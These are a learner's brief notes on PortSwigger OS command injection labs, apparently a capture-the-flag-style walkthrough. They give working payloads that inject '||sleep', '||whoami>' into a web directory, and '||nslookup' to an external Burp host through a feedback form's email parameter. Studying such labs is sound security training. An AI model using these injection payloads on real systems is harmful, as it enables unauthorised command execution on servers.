Portswigger Labs
Last updated
Last updated
Very simple. Check stock is vulnerable:
To solve, cause a 10 second delay. There is a 'Submit feedback' function.
Test each parameter, and find that using the concat function ||
works with the email
parameter.
`email=test@test.com||sleep+10
Blind OS command execution, and response is not returned. To solve, execute whoami
and retrieve output.
This lab gives us a writeable directory at /var/www/images
. Pretty straightforward.
Abusing the email
parameter again, just do ||whoami>/var/www/images/test.txt
. When the home page is loaded, I saw that it uses a filename
parameter:
Using this, change it to filename=test.txt
to solve the lab.
This is pretty simple. One can use curl
or wget
to trigger a response to an external server. Since the lab requires a DNS lookup to be done, use nslookup
.
email=x||nslookup+burp.URL||
One can use a template literal ` to solve this.